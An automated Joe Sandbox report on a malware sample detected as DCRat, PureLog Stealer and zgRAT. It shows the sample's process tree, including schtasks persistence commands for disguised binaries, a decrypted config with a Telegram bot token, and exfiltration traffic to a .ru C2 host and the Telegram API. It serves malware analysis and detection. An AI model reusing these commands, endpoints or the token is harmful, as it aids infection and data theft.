Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eP6sjvTqJa.exe

Overview

General Information

Sample name:eP6sjvTqJa.exe
renamed because original name is a hash value
Original sample name:f0944c44a97161524ce95c9f8a2629f9.exe
Analysis ID:1583030
MD5:f0944c44a97161524ce95c9f8a2629f9
SHA1:064fde39864f9095d21fde250473d0a39d6b15b3
SHA256:06c99a90dd5ad6dfb77196b202d73b6cffe2915cf9edc372da859c62ac0bc2e7
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • eP6sjvTqJa.exe (PID: 2360 cmdline: "C:\Users\user\Desktop\eP6sjvTqJa.exe" MD5: F0944C44A97161524CE95C9F8A2629F9)
    • wscript.exe (PID: 4776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3768 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • fontdrvhost.exe (PID: 3084 cmdline: "C:\/Drivers/fontdrvhost.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
          • schtasks.exe (PID: 3640 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 5 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4196 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2056 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 11 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6008 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3416 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7060 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3564 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5412 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6284 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3172 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Users\user\backgroundTaskHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1372 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3260 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1268 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7096 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3040 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3224 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5632 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3660 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 6072 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 4052 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 6524 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • fontdrvhost.exe (PID: 7192 cmdline: "C:\Drivers\fontdrvhost.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
  • AdbXCBUViTnoVBSsOq.exe (PID: 7048 cmdline: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
  • AdbXCBUViTnoVBSsOq.exe (PID: 1016 cmdline: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
  • fontdrvhost.exe (PID: 6528 cmdline: C:\Drivers\fontdrvhost.exe MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
  • fontdrvhost.exe (PID: 4328 cmdline: C:\Drivers\fontdrvhost.exe MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
eP6sjvTqJa.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    eP6sjvTqJa.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000018.00000002.4579559349.0000000002F9A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000003.2112514278.000000000556C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000018.00000002.4579559349.0000000002E14000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000005.00000000.2139475451.0000000000152000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 5 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.eP6sjvTqJa.exe.6c7d6f3.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.eP6sjvTqJa.exe.6c7d6f3.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.eP6sjvTqJa.exe.55ba6f3.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.eP6sjvTqJa.exe.55ba6f3.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.eP6sjvTqJa.exe.55ba6f3.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 6 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\eP6sjvTqJa.exe, ProcessId: 2360, TargetFilename: C:\Drivers\fontdrvhost.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\eP6sjvTqJa.exe", ParentImage: C:\Users\user\Desktop\eP6sjvTqJa.exe, ParentProcessId: 2360, ParentProcessName: eP6sjvTqJa.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe" , ProcessId: 4776, ProcessName: wscript.exe

                                    Persistence and Installation Behavior

                                    barindex
                                    Sigma detected: Schedule system process
                                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\/Drivers/fontdrvhost.exe", ParentImage: C:\Drivers\fontdrvhost.exe, ParentProcessId: 3084, ParentProcessName: fontdrvhost.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f, ProcessId: 6008, ProcessName: schtasks.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-01T16:02:15.989325+010020480951A Network Trojan was detected192.168.2.649735104.21.38.8480TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-01T16:02:09.731720+010028033053Unknown Traffic192.168.2.64971134.117.59.81443TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-01T16:02:10.878208+010018100091Potentially Bad Traffic192.168.2.649712149.154.167.220443TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: eP6sjvTqJa.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://250345cm.renyash.ru/sqltemp.phpAvira URL Cloud: Label: malware
                                    Source: http://250345cm.renyash.ru/Avira URL Cloud: Label: malware
                                    Source: http://250345cm.renyash.ruAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\backgroundTaskHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\PjHeJXVW.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Drivers\fontdrvhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files\Internet Explorer\en-US\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\lNXiOOwv.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\rfCzNWvT.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\Desktop\beESemrN.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Drivers\fontdrvhost.exeReversingLabs: Detection: 75%
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeReversingLabs: Detection: 75%
                                    Source: C:\Program Files\Internet Explorer\en-US\conhost.exeReversingLabs: Detection: 75%
                                    Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\AdbXCBUViTnoVBSsOq.exeReversingLabs: Detection: 75%
                                    Source: C:\Users\user\Desktop\OwXMDaSq.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\PjHeJXVW.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\beESemrN.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\crKSmbgv.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\lNXiOOwv.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\rfCzNWvT.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\backgroundTaskHost.exeReversingLabs: Detection: 75%
                                    Source: C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exeReversingLabs: Detection: 75%
                                    Multi AV Scanner detection for submitted file
                                    Source: eP6sjvTqJa.exeVirustotal: Detection: 59%Perma Link
                                    Source: eP6sjvTqJa.exeReversingLabs: Detection: 65%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\backgroundTaskHost.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\JRcNKQWy.logJoe Sandbox ML: detected
                                    Source: C:\Drivers\fontdrvhost.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\Internet Explorer\en-US\conhost.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\UXZdmUkL.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\lNXiOOwv.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\rWShinUN.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\rfCzNWvT.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\rFAHquBj.logJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: eP6sjvTqJa.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000005.00000002.2222372567.00000000128A0000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"TelegramNotifer":{"chatid":"6283373442","bottoken":"8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"}}
                                    Source: 00000005.00000002.2222372567.00000000128A0000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","fontdrvhost","0","NEWORK PC","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGtTRW94V2xOSmMwbHFUV2xQYVVvd1kyNVdiRWxwZDJsT1EwazJTVzVTZVdSWFZXbE1RMGt4U1dwdmFXUklTakZhVTBselNXcFphVTlwU2pCamJsWnNTV2wzYVU1NVNUWkpibEo1WkZkVmFVeERTVFJKYW05cFpFaEtNVnBUU1hOSmFtdHBUMmxLTUdOdVZteEphWGRwVFZSQmFVOXBTakJqYmxac1NXbDNhVTFVUldsUGFVb3dZMjVXYkVscGQybE5WRWxwVDJsS01HTnVWbXhKYVhkcFRWUk5hVTlwU2pCamJsWnNTV2wzYVUxVVVXbFBhVW93WTI1V2JFbHVNRDBpWFE9PSJd"]

                                    Compliance

                                    barindex
                                    Detected unpacking (creates a PE file in dynamic memory)
                                    Source: C:\Drivers\fontdrvhost.exeUnpacked PE file: 5.2.fontdrvhost.exe.2520000.7.unpack
                                    Source: eP6sjvTqJa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\en-US\conhost.exeJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\en-US\088424020bedd6Jump to behavior
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49710 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49712 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49779 version: TLS 1.2
                                    Source: eP6sjvTqJa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: eP6sjvTqJa.exe
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B8A69B
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B9C220
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BAB348 FindFirstFileExA,0_2_00BAB348
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49735 -> 104.21.38.84:80
                                    Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.6:49712 -> 149.154.167.220:443
                                    Uses ping.exe to check the status of other devices and networks
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Uses the Telegram API (likely for C&C communication)
                                    Source: unknownDNS query: name: api.telegram.org
                                    Source: global trafficTCP traffic: 192.168.2.6:62426 -> 1.1.1.1:53
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficHTTP traffic detected: POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="41e39329-f7ed-4a24-a87a-8d5d41ec4466"Host: api.telegram.orgContent-Length: 86650Expect: 100-continueConnection: Keep-Alive
                                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                    Source: Joe Sandbox ViewIP Address: 104.21.38.84 104.21.38.84
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                    Source: unknownDNS query: name: ipinfo.io
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49711 -> 34.117.59.81:443
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continue
